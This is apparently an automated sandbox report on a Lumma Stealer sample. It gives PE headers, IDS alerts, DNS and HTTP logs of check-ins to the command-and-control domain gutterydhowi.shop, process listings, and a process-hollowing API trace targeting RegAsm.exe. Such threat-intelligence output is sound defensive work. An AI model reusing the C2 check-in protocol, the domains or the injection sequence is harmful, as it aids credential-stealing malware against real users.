                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                NameVirtual AddressVirtual Size Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x5cde80x53.text
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x5e0000x5c8.rsrc
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x600000xc.reloc
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x5ccb00x1c.text
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                .text0x20000x5ae440x5b000b5a99c3fd656a76b5979c1e150746bf6False0.9937113667582418data7.995414657968518IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                .rsrc0x5e0000x5c80x600a589a4206018b0dca6ae47d5c97f9001False0.4375data4.119926545451393IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .reloc0x600000xc0x200ef500bd10f72fd04b5e7aed0b41ff3fdFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                RT_VERSION0x5e0a00x334data0.4426829268292683
                                                                RT_MANIFEST0x5e3d80x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041
                                                                DLLImport
                                                                mscoree.dll_CorExeMain
                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                2024-09-27T16:47:12.119062+02002056048ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (lootebarrkeyn .shop)1192.168.2.6645031.1.1.153UDP
                                                                2024-09-27T16:47:12.136915+02002056164ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (gutterydhowi .shop)1192.168.2.6512461.1.1.153UDP
                                                                2024-09-27T16:47:12.707321+02002056165ET MALWARE Observed Win32/Lumma Stealer Related Domain (gutterydhowi .shop in TLS SNI)1192.168.2.649711104.21.4.136443TCP
                                                                2024-09-27T16:47:13.162369+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649711104.21.4.136443TCP
                                                                2024-09-27T16:47:13.162369+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649711104.21.4.136443TCP
                                                                2024-09-27T16:47:13.840862+02002056165ET MALWARE Observed Win32/Lumma Stealer Related Domain (gutterydhowi .shop in TLS SNI)1192.168.2.649712104.21.4.136443TCP
                                                                2024-09-27T16:47:14.311281+02002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.649712104.21.4.136443TCP
                                                                2024-09-27T16:47:14.311281+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649712104.21.4.136443TCP
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Sep 27, 2024 16:47:12.193546057 CEST49711443192.168.2.6104.21.4.136
                                                                Sep 27, 2024 16:47:12.193608046 CEST44349711104.21.4.136192.168.2.6
                                                                Sep 27, 2024 16:47:12.193736076 CEST49711443192.168.2.6104.21.4.136
                                                                Sep 27, 2024 16:47:12.242222071 CEST49711443192.168.2.6104.21.4.136
                                                                Sep 27, 2024 16:47:12.242259026 CEST44349711104.21.4.136192.168.2.6
                                                                Sep 27, 2024 16:47:12.707185984 CEST44349711104.21.4.136192.168.2.6
                                                                Sep 27, 2024 16:47:12.707320929 CEST49711443192.168.2.6104.21.4.136
                                                                Sep 27, 2024 16:47:12.750689030 CEST49711443192.168.2.6104.21.4.136
                                                                Sep 27, 2024 16:47:12.750713110 CEST44349711104.21.4.136192.168.2.6
                                                                Sep 27, 2024 16:47:12.751080990 CEST44349711104.21.4.136192.168.2.6
                                                                Sep 27, 2024 16:47:12.796518087 CEST49711443192.168.2.6104.21.4.136
                                                                Sep 27, 2024 16:47:13.039410114 CEST49711443192.168.2.6104.21.4.136
                                                                Sep 27, 2024 16:47:13.039541006 CEST49711443192.168.2.6104.21.4.136
                                                                Sep 27, 2024 16:47:13.039602041 CEST44349711104.21.4.136192.168.2.6
                                                                Sep 27, 2024 16:47:13.162401915 CEST44349711104.21.4.136192.168.2.6
                                                                Sep 27, 2024 16:47:13.162458897 CEST44349711104.21.4.136192.168.2.6
                                                                Sep 27, 2024 16:47:13.162489891 CEST44349711104.21.4.136192.168.2.6
                                                                Sep 27, 2024 16:47:13.162513971 CEST44349711104.21.4.136192.168.2.6
                                                                Sep 27, 2024 16:47:13.162544012 CEST49711443192.168.2.6104.21.4.136
                                                                Sep 27, 2024 16:47:13.162573099 CEST44349711104.21.4.136192.168.2.6
                                                                Sep 27, 2024 16:47:13.162587881 CEST49711443192.168.2.6104.21.4.136
                                                                Sep 27, 2024 16:47:13.162604094 CEST44349711104.21.4.136192.168.2.6
                                                                Sep 27, 2024 16:47:13.162646055 CEST49711443192.168.2.6104.21.4.136
                                                                Sep 27, 2024 16:47:13.184073925 CEST49711443192.168.2.6104.21.4.136
                                                                Sep 27, 2024 16:47:13.184113026 CEST44349711104.21.4.136192.168.2.6
                                                                Sep 27, 2024 16:47:13.363136053 CEST49712443192.168.2.6104.21.4.136
                                                                Sep 27, 2024 16:47:13.363173008 CEST44349712104.21.4.136192.168.2.6
                                                                Sep 27, 2024 16:47:13.363290071 CEST49712443192.168.2.6104.21.4.136
                                                                Sep 27, 2024 16:47:13.363656998 CEST49712443192.168.2.6104.21.4.136
                                                                Sep 27, 2024 16:47:13.363672972 CEST44349712104.21.4.136192.168.2.6
                                                                Sep 27, 2024 16:47:13.840595007 CEST44349712104.21.4.136192.168.2.6
                                                                Sep 27, 2024 16:47:13.840862036 CEST49712443192.168.2.6104.21.4.136
                                                                Sep 27, 2024 16:47:13.842221975 CEST49712443192.168.2.6104.21.4.136
                                                                Sep 27, 2024 16:47:13.842233896 CEST44349712104.21.4.136192.168.2.6
                                                                Sep 27, 2024 16:47:13.842479944 CEST44349712104.21.4.136192.168.2.6
                                                                Sep 27, 2024 16:47:13.843904972 CEST49712443192.168.2.6104.21.4.136
                                                                Sep 27, 2024 16:47:13.843931913 CEST49712443192.168.2.6104.21.4.136
                                                                Sep 27, 2024 16:47:13.843981981 CEST44349712104.21.4.136192.168.2.6
                                                                Sep 27, 2024 16:47:14.311300039 CEST44349712104.21.4.136192.168.2.6
                                                                Sep 27, 2024 16:47:14.311420918 CEST44349712104.21.4.136192.168.2.6
                                                                Sep 27, 2024 16:47:14.311512947 CEST49712443192.168.2.6104.21.4.136
                                                                Sep 27, 2024 16:47:14.316138029 CEST49712443192.168.2.6104.21.4.136
                                                                Sep 27, 2024 16:47:14.316159010 CEST44349712104.21.4.136192.168.2.6
                                                                Sep 27, 2024 16:47:14.316174984 CEST49712443192.168.2.6104.21.4.136
                                                                Sep 27, 2024 16:47:14.316180944 CEST44349712104.21.4.136192.168.2.6
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Sep 27, 2024 16:47:12.119061947 CEST6450353192.168.2.61.1.1.1
                                                                Sep 27, 2024 16:47:12.127742052 CEST53645031.1.1.1192.168.2.6
                                                                Sep 27, 2024 16:47:12.136914968 CEST5124653192.168.2.61.1.1.1
                                                                Sep 27, 2024 16:47:12.153501034 CEST53512461.1.1.1192.168.2.6
                                                                Sep 27, 2024 16:47:36.726321936 CEST53644991.1.1.1192.168.2.6
                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Sep 27, 2024 16:47:12.119061947 CEST192.168.2.61.1.1.10x9cc6Standard query (0)lootebarrkeyn.shopA (IP address)IN (0x0001)false
                                                                Sep 27, 2024 16:47:12.136914968 CEST192.168.2.61.1.1.10xb6b6Standard query (0)gutterydhowi.shopA (IP address)IN (0x0001)false
                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                Sep 27, 2024 16:47:12.127742052 CEST1.1.1.1192.168.2.60x9cc6Name error (3)lootebarrkeyn.shopnonenoneA (IP address)IN (0x0001)false
                                                                Sep 27, 2024 16:47:12.153501034 CEST1.1.1.1192.168.2.60xb6b6No error (0)gutterydhowi.shop104.21.4.136A (IP address)IN (0x0001)false
                                                                Sep 27, 2024 16:47:12.153501034 CEST1.1.1.1192.168.2.60xb6b6No error (0)gutterydhowi.shop172.67.132.32A (IP address)IN (0x0001)false
                                                                • gutterydhowi.shop
                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.649711104.21.4.1364435344C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-09-27 14:47:13 UTC264OUTPOST /api HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                Content-Length: 8
                                                                Host: gutterydhowi.shop
                                                                2024-09-27 14:47:13 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                Data Ascii: act=life
                                                                2024-09-27 14:47:13 UTC553INHTTP/1.1 200 OK
                                                                Date: Fri, 27 Sep 2024 14:47:13 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                X-Frame-Options: SAMEORIGIN
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SlFWPsXhPPAGi3SCzPpkxQ%2FS%2BDhM0epQn2Hhl8zJYzCNBIBz24qKNoS2nNkY29ASGkL8AD4yTVpFxAiiapvKHrGJ7MjPpKlTEOE2Bpv4kA%2FPNvolIvgkUWTUqFENIZTHtUOQvg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8c9c49a2ed360f80-EWR
                                                                2024-09-27 14:47:13 UTC816INData Raw: 31 31 32 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                                                Data Ascii: 112d<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                                                2024-09-27 14:47:13 UTC1369INData Raw: 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f
                                                                Data Ascii: s/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('co
                                                                2024-09-27 14:47:13 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 30 41 4c 78 39 61 73 32 31 50 30 77 67 6e 4d 61 41 77 67 72 35 65 45 5a 42 55 78 34 6c 6a 71 44 78 37 78 5a 31 6a 52 34 39 4a 49 2d 31 37 32 37 34 34 38 34 33 33 2d 30 2e 30 2e 31 2e 31 2d 2f 61 70 69 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20
                                                                Data Ascii: <input type="hidden" name="atok" value="0ALx9as21P0wgnMaAwgr5eEZBUx4ljqDx7xZ1jR49JI-1727448433-0.0.1.1-/api"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn"
                                                                2024-09-27 14:47:13 UTC851INData Raw: 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 3c
                                                                Data Ascii: sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare<
                                                                2024-09-27 14:47:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1192.168.2.649712104.21.4.1364435344C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-09-27 14:47:13 UTC354OUTPOST /api HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Cookie: __cf_mw_byp=0ALx9as21P0wgnMaAwgr5eEZBUx4ljqDx7xZ1jR49JI-1727448433-0.0.1.1-/api
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                Content-Length: 42
                                                                Host: gutterydhowi.shop
                                                                2024-09-27 14:47:13 UTC42OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 46 41 54 45 39 39 2d 2d 26 6a 3d
                                                                Data Ascii: act=recive_message&ver=4.0&lid=FATE99--&j=
                                                                2024-09-27 14:47:14 UTC776INHTTP/1.1 200 OK
                                                                Date: Fri, 27 Sep 2024 14:47:14 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Set-Cookie: PHPSESSID=tas7jdesfl7g3va072f5ge7npm; expires=Tue, 21 Jan 2025 08:33:53 GMT; Max-Age=9999999; path=/
                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                Pragma: no-cache
                                                                CF-Cache-Status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qB52WkxF%2F76dignHyy4iqz83xTZkzHex0NtoX79%2FhWKwoGLrwXbCHaBUdwrTQKaw7MKOYNQfr5utA6jHCp%2Fu8g8DwZBD%2F88oyxJXLtnTGXBTzSlJ1AHfUcLKasKAXuvDQ13nww%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8c9c49a819ed436d-EWR
                                                                2024-09-27 14:47:14 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                Data Ascii: aerror #D12
                                                                2024-09-27 14:47:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Click to jump to process

                                                                Click to jump to process

                                                                Click to dive into process behavior distribution

                                                                Click to jump to process

                                                                Target ID:1
                                                                Start time:10:47:09
                                                                Start date:27/09/2024
                                                                Path:C:\Users\user\Desktop\FoS5cjKhd3.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\FoS5cjKhd3.exe"
                                                                Imagebase:0x980000
                                                                File size:375'296 bytes
                                                                MD5 hash:3B2250172CDC65F249533AD138EF8AB5
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000001.00000002.2205251595.0000000003CD5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:2
                                                                Start time:10:47:09
                                                                Start date:27/09/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff66e660000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:3
                                                                Start time:10:47:10
                                                                Start date:27/09/2024
                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                Imagebase:0x750000
                                                                File size:65'440 bytes
                                                                MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:7
                                                                Start time:10:47:13
                                                                Start date:27/09/2024
                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5344 -s 1768
                                                                Imagebase:0x290000
                                                                File size:483'680 bytes
                                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:8
                                                                Start time:10:47:13
                                                                Start date:27/09/2024
                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5344 -s 1772
                                                                Imagebase:0x290000
                                                                File size:483'680 bytes
                                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Reset < >

                                                                  Execution Graph

                                                                  Execution Coverage:36.1%
                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                  Signature Coverage:30%
                                                                  Total number of Nodes:20
                                                                  Total number of Limit Nodes:0

                                                                  Callgraph

                                                                  • Executed
                                                                  • Not Executed
                                                                  • Opacity -> Relevance
                                                                  • Disassembly available
                                                                  callgraph 0 Function_02B60234 1 Function_02B601B4 2 Function_02B60534 46 Function_02B60260 2->46 3 Function_02B600B0 4 Function_02B60BB0 5 Function_02B6013C 6 Function_02B600BC 7 Function_02B604BD 8 Function_02B604B9 9 Function_02B60224 10 Function_02B610A5 10->46 11 Function_02B600A0 12 Function_02B61220 13 Function_02B6012C 14 Function_02B60B2A 15 Function_02CD2151 16 Function_02B60528 16->46 17 Function_02B601A8 18 Function_02B60214 19 Function_02B60090 20 Function_02B6051C 21 Function_02B6011C 22 Function_02B60198 23 Function_02B61218 24 Function_02B60100 25 Function_02B60080 26 Function_02B6048F 27 Function_02B6010C 28 Function_02B60988 28->2 28->12 28->14 28->16 28->20 28->23 69 Function_02B60C40 28->69 70 Function_02B60540 28->70 29 Function_02B60188 30 Function_02B60208 31 Function_02CD248C 32 Function_02B60475 33 Function_02B604F5 34 Function_02B60070 35 Function_02B600F0 36 Function_02B60270 37 Function_02B60471 38 Function_02B604F1 39 Function_02B60178 40 Function_02B60978 40->2 40->12 40->14 40->16 40->20 40->23 40->69 40->70 41 Function_02B60479 42 Function_02B604F9 43 Function_02B600E4 44 Function_02B60165 45 Function_02B60465 47 Function_02B60461 48 Function_02B612E1 49 Function_02B6046D 50 Function_02B601EA 51 Function_02B608E8 52 Function_02B60469 53 Function_02B61056 54 Function_02B604D7 55 Function_02B60154 56 Function_02B600D4 57 Function_02B60254 58 Function_02B60555 59 Function_02B60450 60 Function_02B60551 61 Function_02CD1FAA 62 Function_02B6105C 62->46 63 Function_02B6045D 64 Function_02B608D8 65 Function_02B60559 66 Function_02B611C6 67 Function_02B60244 68 Function_02B60444 69->46 71 Function_02B601C0 72 Function_02B604C1 73 Function_02B611CC 73->46 74 Function_02CD1D37 75 Function_02B6004D 76 Function_02B6054D 77 Function_02B60148 78 Function_02B600C8 79 Function_02B60848

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • CreateProcessA.KERNELBASE(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02CD20C3,02CD20B3), ref: 02CD22C0
                                                                  • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02CD22D3
                                                                  • Wow64GetThreadContext.KERNEL32(0000009C,00000000), ref: 02CD22F1
                                                                  • ReadProcessMemory.KERNELBASE(0000008C,?,02CD2107,00000004,00000000), ref: 02CD2315
                                                                  • VirtualAllocEx.KERNELBASE(0000008C,?,?,00003000,00000040), ref: 02CD2340
                                                                  • WriteProcessMemory.KERNELBASE(0000008C,00000000,?,?,00000000,?), ref: 02CD2398
                                                                  • WriteProcessMemory.KERNELBASE(0000008C,00400000,?,?,00000000,?,00000028), ref: 02CD23E3
                                                                  • WriteProcessMemory.KERNELBASE(0000008C,?,?,00000004,00000000), ref: 02CD2421
                                                                  • Wow64SetThreadContext.KERNEL32(0000009C,02BB0000), ref: 02CD245D
                                                                  • ResumeThread.KERNELBASE(0000009C), ref: 02CD246C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2204496726.0000000002CD1000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD1000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2cd1000_FoS5cjKhd3.jbxd
                                                                  Similarity
                                                                  • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$CreateProcessA$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                                  • API String ID: 2687962208-1257834847
                                                                  • Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                  • Instruction ID: 836fffbc43540285a933d6f4afd58748600d289302b1a743fb915e9676a778f8
                                                                  • Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                  • Instruction Fuzzy Hash: 8DB1E67664024AAFDB60CF68CC80BDA77A5FF88714F158524EA0CAB341D774FA51CB94

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
